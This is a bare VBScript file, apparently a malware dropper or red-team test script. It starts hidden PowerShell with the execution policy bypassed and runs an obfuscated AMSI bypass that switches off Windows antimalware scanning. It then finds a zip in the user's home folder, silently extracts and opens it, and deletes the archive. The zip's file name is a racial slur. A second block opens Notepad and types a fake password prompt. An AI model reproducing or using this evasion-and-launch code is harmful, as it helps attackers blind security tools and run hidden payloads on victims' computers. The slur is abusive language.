Set oshell = wscript.createobject("wscript.shell")
oshell.run "powershell.exe -nop -exec bypass; [Ref].Assembly.GetType('System.Management.Automation.'+$([CHar](81-16)+[cHaR](109)+[CHaR]([byTe]0x73)+[cHaR](56+49))+'Utils').GetField($([cHaR](57+40)+[ChAR](102+7)+[cHar](150-35)+[CHAR]([BYte]0x69)+[CHar]([bYTE]0x49)+[cHaR]([byte]0x6E)+[chaR]([BYte]0x69)+[ChAr](10556/91)+[CHAr]([bYTe]0x46)+[CHaR]([byte]0x61)+[Char]([byTE]0x69)+[ChAR](108)+[chAr](113-12)+[chaR]([BytE]0x64)),'NonPublic,Static').SetValue($null,$true); ""& {$lookfile = get-childitem -path ~\* -recurse -include *bitchynigga.zip -erroraction silentlycontinue ; $foundfile = test-path $lookfile ; If ($foundfile -eq $True) {"" $lookfile | Expand-Archive -destinationpath ""~\downloads\bitchynigga"" -force; ii ""~\downloads\bitchynigga""; $lookfile | remove-item ""} Else {""calc.exe""}}""", 0, True


Set Notepad = WScript.CreateObject("WScript.Shell")
Notepad.Run "c:\windows\system32\notepad.exe", 1, True

WScript.Sleep 1000

Notepad.SendKeys "Password: secure this"
